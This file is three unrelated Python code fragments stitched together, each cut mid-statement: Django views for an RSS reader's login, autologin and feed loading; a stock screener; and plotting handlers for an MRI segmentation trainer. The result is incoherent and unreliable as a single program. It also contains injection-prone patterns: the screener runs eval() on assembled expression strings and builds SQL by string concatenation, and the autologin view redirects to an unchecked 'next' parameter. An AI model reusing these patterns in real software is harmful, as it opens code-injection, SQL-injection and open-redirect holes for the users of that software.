).select_related('feed')[:2] statistics = MStatistics.all() social_profile = MSocialProfile.get_user(user.pk) start_import_from_google_reader = request.session.get('import_from_google_reader', False) if start_import_from_google_reader: del request.session['import_from_google_reader'] if not user.is_active: url = "https://%s%s" % (Site.objects.get_current().domain, reverse('stripe-form')) return HttpResponseRedirect(url) logging.user(request, "~FBLoading dashboard") return { 'user_profile' : user.profile, 'feed_count' : feed_count, 'account_images' : range(1, 4), 'recommended_feeds' : recommended_feeds, 'unmoderated_feeds' : unmoderated_feeds, 'statistics' : statistics, 'social_profile' : social_profile, 'start_import_from_google_reader': start_import_from_google_reader, 'debug' : settings.DEBUG, }, "reader/dashboard.xhtml" def welcome(request, **kwargs): user = get_user(request) statistics = MStatistics.all() social_profile = MSocialProfile.get_user(user.pk) if request.method == "POST": if request.POST.get('submit', '').startswith('log'): login_form = LoginForm(request.POST, prefix='login') signup_form = SignupForm(prefix='signup') else: login_form = LoginForm(prefix='login') signup_form = SignupForm(request.POST, prefix='signup') else: login_form = LoginForm(prefix='login') signup_form = SignupForm(prefix='signup') logging.user(request, "~FBLoading welcome") return { 'user_profile' : hasattr(user, 'profile') and user.profile, 'login_form' : login_form, 'signup_form' : signup_form, 'statistics' : statistics, 'social_profile' : social_profile, 'post_request' : request.method == 'POST', }, "reader/welcome.xhtml" @never_cache def login(request): code = -1 message = "" if request.method == "POST": form = LoginForm(request.POST, prefix='login') if form.is_valid(): login_user(request, form.get_user()) if request.POST.get('api'): logging.user(form.get_user(), "~FG~BB~SKiPhone Login~FW") code = 1 else: logging.user(form.get_user(), "~FG~BBLogin~FW") return HttpResponseRedirect(reverse('index')) else: message = form.errors.items()[0][1][0] if request.POST.get('api'): return HttpResponse(json.encode(dict(code=code, message=message)), content_type='application/json') else: return index(request) @never_cache def signup(request): if request.method == "POST": form = SignupForm(prefix='signup', data=request.POST) if form.is_valid(): new_user = form.save() login_user(request, new_user) logging.user(new_user, "~FG~SB~BBNEW SIGNUP: ~FW%s" % new_user.email) if not new_user.is_active: url = "https://%s%s" % (Site.objects.get_current().domain, reverse('stripe-form')) return HttpResponseRedirect(url) return index(request) @never_cache def logout(request): logging.user(request, "~FG~BBLogout~FW") logout_user(request) if request.GET.get('api'): return HttpResponse(json.encode(dict(code=1)), content_type='application/json') else: return HttpResponseRedirect(reverse('index')) def autologin(request, username, secret): next = request.GET.get('next', '') if not username or not secret: return HttpResponseForbidden() profile = Profile.objects.filter(user__username=username, secret_token=secret) if not profile: return HttpResponseForbidden() user = profile[0].user user.backend = settings.AUTHENTICATION_BACKENDS[0] login_user(request, user) logging.user(user, "~FG~BB~SKAuto-Login. Next stop: %s~FW" % (next if next else 'Homepage',)) if next and not next.startswith('/'): next = '?next=' + next return HttpResponseRedirect(reverse('index') + next) elif next: return HttpResponseRedirect(next) else: return HttpResponseRedirect(reverse('index')) @ratelimit(minutes=1, requests=60) @never_cache @json.json_view def load_feeds(request): user = get_user(request) feeds = {} include_favicons = request.REQUEST.get('include_favicons', False) flat = request.REQUEST.get('flat', False) update_counts = request.REQUEST.get('update_counts', False) version = int(request.REQUEST.get('v', 1)) if include_favicons == 'false': include_favicons = False if update_counts == 'false': update_counts = False if flat == 'false': flat = False if flat: return load_feeds_flat(request) try: folders = UserSubscriptionFolders.objects.get(user=user) except UserSubscriptionFolders.DoesNotExist: data = dict(feeds=[], folders=[]) return data except UserSubscriptionFolders.MultipleObjectsReturned: UserSubscriptionFolders.objects.filter(user=user)[1:].delete() folders = UserSubscriptionFolders.objects.get(user=user) user_subs = UserSubscription.objects.select_related('feed').filter(user=user) day_ago = datetime.datetime.now() - datetime.timedelta(days=1) scheduled_feeds = [] for sub in user_subs: pk = sub.feed_id if update_counts and sub.needs_unread_recalc: sub.calculate_feed_scores(silent=True) feeds[pk] = sub.canonical(include_favicon=include_favicons) if not sub.active: continue if not sub.feed.active and not sub.feed.has_feed_exception: scheduled_feeds.append(sub.feed.pk) elif sub.feed.active_subscribers <= 0: scheduled_feeds.append(sub.feed.pk) elif sub.feed.next_scheduled_update < day_ago: scheduled_feeds.append(sub.feed.pk) if len(scheduled_feeds) > 0 and request.user.is_authenticated(): logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." % len(scheduled_feeds)) ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk)) starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True) if not starred_count and len(starred_counts): starred_count = MStarredStory.objects(user_id=user.pk).count() social_params = { 'user_id': user.pk, 'include_favicon': include_favicons, 'update_counts': update_counts, } social_feeds = MSocialSubscription.feeds(**social_params) social_profile = MSocialProfile.profile(user.pk) social_services = MSocialServices.profile(user.pk) categories = None if not user_subs: categories = MCategory.serialize() logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB feeds/socials%s" % ( len(feeds.keys()), len(social_feeds), '. ~FCUpdating counts.' if update_counts else '')) data = { 'feeds': feeds.values() if version == 2 else feeds, 'social_feeds': social_feeds, 'social_profile': social_profile, 'social_services': social_services, 'user_profile': user.profile, "is_staff": user.is_staff, 'user_id': user.pk, 'folders': json.decode(folders.folders), 'starred_count': starred_count, 'starred_counts': starred_counts, 'categories': categories } return data @json.json_view def load_feed_favicons(request): user = get_user(request) feed_ids = request.REQUEST.getlist('feed_ids') if not feed_ids: user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True) feed_ids = [sub['feed__pk'] for sub in user_subs.values('feed__pk')] feed_icons = dict([(i.feed_id, i.data) for i in MFeedIcon.objects(feed_id__in=feed_ids)]) return feed_icons def load_feeds_flat(request): user = request.user include_favicons = is_true(request.REQUEST.get('include_favicons', False)) update_counts = is_true(request.REQUEST.get('update_counts', True)) include_inactive = is_true(request.REQUEST.get('include_inactive', False)) feeds = {} inactive_feeds = {} day_ago = datetime.datetime.now() - datetime.timedelta(days=1) scheduled_feeds = [] iphone_version = "2.1" # Preserved forever. Don't change. latest_ios_build = "52" latest_ios_version = "5.0.0b2" if include_favicons == 'false': include_favicons = False if update_counts == 'false': update_counts = False if not user.is_authenticated(): return HttpResponseForbidden() try: folders = UserSubscriptionFolders.objects.get(user=user) except UserSubscriptionFolders.DoesNotExist: folders = [] user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True) if not user_subs and folders: folders.auto_activate() user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True) if include_inactive: inactive_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=False) for sub in user_subs: if update_counts and sub.needs_unread_recalc: sub.calculate_feed_scores(silent=True) feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons) if not sub.feed.active and not sub.feed.has_feed_exception: scheduled_feeds.append(sub.feed.pk) elif sub.feed.active_subscribers <= 0: scheduled_feeds.append(sub.feed.pk) elif sub.feed.next_scheduled_update < day_ago: scheduled_feeds.append(sub.feed.pk) if include_inactive: for sub in inactive_subs: inactive_feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons) if len(scheduled_feeds) > 0 and request.user.is_authenticated(): logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." % len(scheduled_feeds)) ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk)) flat_folders = [] flat_folders_with_inactive = [] if folders: flat_folders = folders.flatten_folders(feeds=feeds) flat_folders_with_inactive = folders.flatten_folders(feeds=feeds, inactive_feeds=inactive_feeds) social_params = { 'user_id': user.pk, 'include_favicon': include_favicons, 'update_counts': update_counts, } social_feeds = MSocialSubscription.feeds(**social_params) social_profile = MSocialProfile.profile(user.pk) social_services = MSocialServices.profile(user.pk) starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True) if not starred_count and len(starred_counts): starred_count = MStarredStory.objects(user_id=user.pk).count() categories = None if not user_subs: categories = MCategory.serialize() logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB/~FR%s~FB feeds/socials/inactive ~FMflat~FB%s" % ( len(feeds.keys()), len(social_feeds), len(inactive_feeds), '. ~FCUpdating counts.' if update_counts else '')) data = { "flat_folders": flat_folders, "flat_folders_with_inactive": flat_folders_with_inactive, "feeds": feeds if not include_inactive else {"0": "Don't include `include_inactive=true` if you want active feeds."}, "inactive_feeds": inactive_feeds if include_inactive else {"0": "Include `include_inactive=true`"}, "social_feeds": social_feeds, "social_profile": social_profile, "social_services": social_services, "user": user.username, "user_id": user.pk, "is_staff": user.is_staff, "user_profile": user.profile, "iphone_version": iphone_version, "latest_ios_build": latest_ios_build, "latest_ios_version": latest_ios_version, "categories": categories, 'starred_count': starred_count, 'starred_counts': starred_counts, 'share_ext_token': user.profile.secret_token, } return data @ratelimit(minutes=1, requests=10) @never_cache @json.json_view def refresh_feeds(request): start = datetime.datetime.now() user = get_user(request) feed_ids = request.REQUEST.getlist('feed_id') check_fetch_status = request.REQUEST.get('check_fetch_status') favicons_fetching = request.REQUEST.getlist('favicons_fetching') social_feed_ids = [feed_id for feed_id in feed_ids if 'social:' in feed_id] feed_ids = list(set(feed_ids) - set(social_feed_ids)) feeds = {} if feed_ids or (not social_feed_ids and not feed_ids): feeds = UserSubscription.feeds_with_updated_counts(user, feed_ids=feed_ids, check_fetch_status=check_fetch_status) checkpoint1 = datetime.datetime.now() social_feeds = {} if social_feed_ids or (not social_feed_ids and not feed_ids): social_feeds = MSocialSubscription.feeds_with_updated_counts(user, social_feed_ids=social_feed_ids) checkpoint2 = datetime.datetime.now() favicons_fetching = [int(f) for f in favicons_fetching if f] feed_icons = {} if favicons_fetching: feed_icons = dict([(i.feed_id, i) for i in MFeedIcon.objects(feed_id__in=favicons_fetching)]) for feed_id, feed in feeds.items(): if feed_id in favicons_fetching and feed_id in feed_icons: feeds[feed_id]['favicon'] = feed_icons[feed_id].data feeds[feed_id]['favicon_color'] = feed_icons[feed_id].color feeds[feed_id]['favicon_fetching'] = feed.get('favicon_fetching') user_subs = UserSubscription.objects.filter(user=user, active=True).only('feed') sub_feed_ids = [s.feed_id for s
if results[k] is None: results[k] = True if v[0] == 6: #'reached high/low' if v[3] is None: v[3] = 1 period = getOffset(v[2].strip().lower(), v[1][0]) name = v[1][0] + ' ' + v[1][1] for i in range(1, v[3]+1): if indicators[name] is None or len(indicators[name]) <= i+period: results[k] = False break value1 = getIndicatorValue(indicators, v[1], i) value2 = [getIndicatorValue(indicators, v[1], i+j) for j in range(period)] if 'high' in v[2]: result = (value1 >= max(value2)) else: result = (value1 <= min(value2)) if result: results[k] = True break if results[k] is None: results[k] = False if v[0] == 99: #formed Candlestick Pattern name = v[2] if 'candlestick pattern' in name: isPatternFound = False sortedByRankMap = sorted(cp_mapping.items(), key=lambda x: x[1][2]) if name == 'bullish candlestick pattern': cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] > 0) elif name == 'bearish candlestick pattern': cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] < 0) else: cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] == 0) for cs_pattern in cs_patterns: #sorted by performance rank isPatternFound = isCandlestickPatternFound(cs_pattern, v[3], dataframe[v[1]], cp_mapping) if isPatternFound: break results[k] = isPatternFound else: results[k] = isCandlestickPatternFound(name, v[3], dataframe[v[1]], cp_mapping) #logger.debug(k + ' = ' + str(results[k])) except Exception as e: logger.error(f'{symbol[0]}: {traceback.format_exc()}') return None return results @staticmethod def sceener(symbol, expression, timeframes, translation): utils.engine.dispose() result = False results = MyScreener.getResults(symbol, timeframes, translation) logger.debug(results) if len(translation) == 1 and list(translation.values())[0][0] in [7, 8]: return results if results is not None: #logger.debug('expression: ' + expression) newexpression = expression for k, v in results.items(): newexpression = newexpression.replace(k, str(v)) newexpression = newexpression.replace('[', '(').replace(']', ')').replace('\r', ' ').replace('\n', ' ') #logger.debug('newexpression: ' + newexpression) try: result = eval(newexpression) except Exception as e: logger.error(f'{newexpression}: {traceback.format_exc()}') return None logger.debug(f'{symbol}: {str(result)}') return symbol if result else None @staticmethod def calculateIndicator(timeframe, function, dataframe): np.seterr(all='warn') if function.lower() in ['open', 'high', 'low', 'close', 'volume']: return (function, dataframe[timeframe][function]) i = function.find('(') name = function[:i] parameters = function[i+1:] result = None for k, v in TA_MAPPING.items(): if name.lower() == k: x = v[0] + '(' for j in range(1, len(v)-1): x += "dataframe['" + timeframe + "']['" + v[j] + "']," if len(parameters) > 1: key = name.lower() if 'macd' in key: #swap 1st and 2nd arguments for MACD to conform to the usual order of parameters parameters = parameters[:-1].split(',') if key == 'macd': x += parameters[1] + ',' + parameters[0] + ')' else: x += parameters[1] + ',' + parameters[0] + ',' + parameters[2] + ')' else: x += parameters else: x = x[:-1] + ')' #print(x) try: result = eval(x) except Exception as e: logger.error(f'{x}: {traceback.format_exc()}') result = dataframe[timeframe]['close'] result.values[:] = 0 return (k + function[i:], result) errorMessage = f'{name} is undefined in ta_mapping' logger.error(errorMessage) raise Exception(errorMessage) def checkExpression(self, expression): logger.debug('expression: ' + expression) #start = timer() statements = self.__separate(expression) if len(statements) > 0: translation = {} for statement in statements: logger.debug('statement: ' + statement) translation[statement] = self.__translate(statement) logger.debug('translated: ' + str(translation[statement])) #end = timer() #logger.debug(f'translation done in {str(100*(end-start))} ms') timeframes = self.getTimeframes(translation) symbol = 'SPY' #['FSZ-DBA.TO', 204] #this is a test case for exception #start = timer() result = MyScreener.sceener(symbol, expression, timeframes, translation) #end = timer() #logger.debug(f'got result in {str(100*(end-start))} ms') #if len(translation) == 1 and list(translation.values())[0][0] in [7, 8]: # logger.debug(result) #else: # result = result is not None # logger.debug(f'result: {str(result)}') return translation def getTimeframes(self, translationMap): timeframes = {} for translation in translationMap.values(): if translation[0] == 99: duration = translation[-1] if duration is None: duration = 1 if translation[1] not in timeframes: timeframes[translation[1]] = duration elif duration > timeframes[translation[1]]: timeframes[translation[1]] = duration elif translation[0] in [7, 8]: if translation[2][0] not in timeframes: timeframes[translation[2][0]] = translation[2][-1] elif translation[2][-1] > timeframes[translation[2][0]]: timeframes[translation[2][0]] = translation[2][-1] else: if translation[1][0] not in timeframes: timeframes[translation[1][0]] = translation[1][-1] elif translation[1][-1] > timeframes[translation[1][0]]: timeframes[translation[1][0]] = translation[1][-1] if len(translation) > 3: if translation[0] == 2 and type(translation[2]) is list: if translation[2][0] not in timeframes: timeframes[translation[2][0]] = translation[2][-1] elif translation[2][-1] > timeframes[translation[2][0]]: timeframes[translation[2][0]] = translation[2][-1] if type(translation[3]) is list: if translation[3][0] not in timeframes: timeframes[translation[3][0]] = translation[3][-1] elif translation[3][-1] > timeframes[translation[3][0]]: timeframes[translation[3][0]] = translation[3][-1] return timeframes def __getAllSymbols(self): price = None if self._priceType is not None and (self._priceLow is not None or self._priceHigh is not None): if self._priceType == 0: price = 'lastDayPrice' elif self._priceType == 1: price = 'avg30DayPrice' elif self._priceType == 2: price = 'avg60DayPrice' elif self._priceType == 3: price = 'avg90DayPrice' volume = None if self._volumeType is not None and (self._volumeLow is not None or self._volumeHigh is not None): if self._volumeType == 0: volume = 'lastDayVolume' elif self._volumeType == 1: volume = 'avg30DayVolume' elif self._volumeType == 2: volume = 'avg60DayVolume' elif self._volumeType == 3: volume = 'avg90DayVolume' lastDate = (datetime.today() - timedelta(days=4)).strftime(utils.date_format) #take into account weekend and holidays query = f"SELECT ticker FROM symbols WHERE active=1 and lastDate >= '{lastDate}'" #only consider symbols that are active and have price up to date if self._symbols is not None: query += " and ticker in (" + ', '.join(["'%s'" %symbol for symbol in self._symbols]) + ")" if price is not None: if self._priceLow is not None: query += " and " + price + ">=" + str(self._priceLow) if self._priceHigh is not None: query += " and " + price + "<=" + str(self._priceHigh) if volume is not None: if self._volumeLow is not None: query += " and " + volume + ">=" + str(self._volumeLow) if self._volumeHigh is not None: query += " and " + volume + "<=" + str(self._volumeHigh) if self._industries is not None: query += " and industry in (" + ', '.join(["'%s'" %industry for industry in self._industries.split()]) + ")" #logger.info(query) with contextlib.closing(utils.engine.raw_connection()) as conn: cursor = conn.cursor() cursor.execute(query) rows = cursor.fetchall() cursor.close() return [row[0] for row in rows] def getMatchingSymbols(self): logger.info('screener_id = ' + str(self._id)) if self._translation is None or len(self._translation) == 0: if self._expression is None or len(self._expression) == 0: logger.info('missing expression') return logger.info('new expression to translate: ' + self._expression) statements = self.__separate(self._expression) if len(statements) == 0: logger.info('no valid statement') return translation = {} for statement in statements: translation[statement] = self.__translate(statement) logger.debug('translation: ' + str(translation)) if len(translation) == 0: logger.info('no valid translation') return replaceTranslation(self._id, translation) self._translation = translation matchingSymbols = [] symbols = self.__getAllSymbols() logger.info(f'#symbols: {str(len(symbols))}') if len(symbols) == 0: return matchingSymbols isTop = False isBottom = False translationValue = None if len(self._translation) == 1: translationValue = list(self._translation.values())[0] if translationValue[0] == 7: isTop = True if translationValue[0] == 8: isBottom = True if (isTop or isBottom) and type(translationValue[2]) is str: #IBDRS query = "SELECT ticker FROM symbols WHERE active=1 and ticker in ({}) order by ibdRelativeStrength {} limit {}" \ .format(','.join([f"'{symbol}'" for symbol in symbols]), 'desc' if isTop else 'asc', translationValue[1]) with contextlib.closing(utils.engine.raw_connection()) as conn: cursor = conn.cursor() cursor.execute(query) rows = cursor.fetchall() cursor.close() matchingSymbols = [row[0] for row in rows] logger.info(f'#matchingSymbols: {str(len(matchingSymbols))}') return matchingSymbols timeframes = self.getTimeframes(self._translation) """ #do in single process for symbol in symbols: result = MyScreener.sceener(symbol, self._expression, timeframes, self._translation) if result is not None: matchingSymbols.append(result) """ #do with multiprocessing if __name__ == '__main__': parameters = [(symbol, self._expression, timeframes, self._translation) for symbol in symbols] processes = mp.cpu_count() #this process is mainly cpu bound with mp.Pool(processes=processes) as pool: results = pool.starmap(MyScreener.sceener, parameters) if isTop: results = dict((key,d[key]) for d in results for key in d) matchingSymbols = heapq.nlargest(int(translationValue[1]), results, key=results.get) elif isBottom: results = dict((key,d[key]) for d in results for key in d) matchingSymbols = heapq.nsmallest(int(translationValue[1]), results, key=results.get) else: for result in results: if result is not None: matchingSymbols.append(result) logger.info(f'#matchingSymbols: {str(len(matchingSymbols))}') return matchingSymbols def isBlank(myString): if myString and myString.strip(): #myString is not None AND myString is not empty or blank return False #myString is None OR myString is empty or blank return True def getOffset(text, timeframe): if len(text)
"rownames": ["Background", "CSF", "GM", "WM"], "title": "Confusion Matrix"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "iSEG Confusion Matrix", PlotType.HEATMAP_PLOT, params={ "opts": {"columnnames": ["VM", "GM", "CSF", "Background"], "rownames": ["Background", "CSF", "GM", "WM"], "title": "iSEG Confusion Matrix"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "MRBrainS Confusion Matrix", PlotType.HEATMAP_PLOT, params={"opts": {"columnnames": ["VM", "GM", "CSF", "Background"], "rownames": ["Background", "CSF", "GM", "WM"], "title": "MRBrainS Confusion Matrix"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "ABIDE Confusion Matrix", PlotType.HEATMAP_PLOT, params={ "opts": {"columnnames": ["VM", "GM", "CSF", "Background"], "rownames": ["Background", "CSF", "GM", "WM"], "title": "ABIDE Confusion Matrix"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "Runtime", PlotType.TEXT_PLOT, params={"opts": {"title": "Runtime"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Jensen-Shannon Divergence", every=1, params={"title": "Jensen-Shannon Divergence on test data per Epoch", "legend": ["Inputs", "Normalized"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Hausdorff Distance per class per epoch on reconstructed iSEG image", every=1, params={ "title": "Hausdorff Distance per class per epoch on reconstructed iSEG image", "legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Hausdorff Distance per class per epoch on reconstructed MRBrainS image", every=1, params={ "title": "Hausdorff Distance per class per epoch on reconstructed MRBrainS image", "legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Hausdorff Distance per class per epoch on reconstructed ABIDE image", every=1, params={ "title": "Hausdorff Distance per class per epoch on reconstructed ABIDE image", "legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Dice score per class per epoch", every=1, params={"title": "Dice score on test patches per class per epoch", "legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Dice score per class per epoch on reconstructed iSEG image", every=1, params={ "title": "Dice score per class per epoch on reconstructed iSEG image", "legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Dice score per class per epoch on reconstructed MRBrainS image", every=1, params={ "title": "Dice score per class per epoch on reconstructed MRBrainS image", "legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Dice score per class per epoch on reconstructed ABIDE image", every=1, params={ "title": "Dice score per class per epoch on reconstructed ABIDE image", "legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Input iSEG Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Input iSEG Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Input T2 iSEG Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Input T2 iSEG Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Normalized iSEG Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Normalized iSEG Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Segmented iSEG Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Segmented iSEG Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth iSEG Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Ground Truth iSEG Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Initial Noise iSEG Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Initial Noise iSEG Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Augmented iSEG After Normalization", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Augmented iSEG After Normalization"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Augmented Input iSEG Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Augmented Input iSEG Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Input MRBrainS Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Input MRBrainS Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Input T2 MRBrainS Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Input T2 MRBrainS Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Normalized MRBrainS Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Normalized MRBrainS Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Segmented MRBrainS Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Segmented MRBrainS Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth MRBrainS Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Ground Truth MRBrainS Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Initial Noise MRBrainS Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Initial Noise MRBrainS Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Augmented MRBrainS After Normalization", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Augmented MRBrainS After Normalization"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Augmented Input MRBrainS Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Augmented Input MRBainS Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Input ABIDE Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Input ABIDE Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Normalized ABIDE Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Normalized ABIDE Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth ABIDE Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Ground Truth ABIDE Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Segmented ABIDE Image", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True, "title": "Reconstructed Segmented ABIDE Image"}}, every=10), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomLinePlotWithLegend(visdom_logger, "Per Dataset Mean Hausdorff Distance", every=1, params={"title": "Per Dataset Mean Hausdorff Distance", "legend": list(dataset_configs.keys())}), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Per-Dataset Histograms", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Reconstructed Images Histograms", PlotType.IMAGE_PLOT, params={"opts": {"store_history": True}}, every=5), Event.ON_TEST_EPOCH_END) \ .with_event_handler( Checkpoint(save_folder, monitor_fn=lambda model_trainer: model_trainer.valid_loss, delta=0.01, mode=MonitorMode.MIN), Event.ON_EPOCH_END) \ .with_event_handler(PlotAvgGradientPerLayer(visdom_logger, every=25), Event.ON_TRAIN_BATCH_END) return trainer elif self._trainer == TrainerType.UNET: trainer = UNetTrainer(training_config, model_trainers, dataloaders[0], dataloaders[1], dataloaders[2], reconstruction_datasets, input_reconstructor, segmentation_reconstructor, augmented_input_reconstructor, gt_reconstructor, run_config, dataset_configs, save_folder) \ .with_event_handler(PrintTrainingStatus(every=25), Event.ON_BATCH_END) \ .with_event_handler(PrintMonitorsTable(every=25), Event.ON_BATCH_END) \ .with_event_handler(PlotMonitors(visdom_logger), Event.ON_EPOCH_END) \ .with_event_handler(PlotLR(visdom_logger), Event.ON_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Training Input Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Training Input Patches Process {}".format( run_config.local_rank)}}, every=500), Event.ON_TRAIN_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Validation Input Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Validation Input Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_VALID_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Test Input Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Test Input Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Training Segmented Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Segmented Patches Process {}".format( run_config.local_rank)}}, every=500), Event.ON_TRAIN_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Validation Segmented Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Validation Segmented Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_VALID_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Test Segmented Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Test Segmented 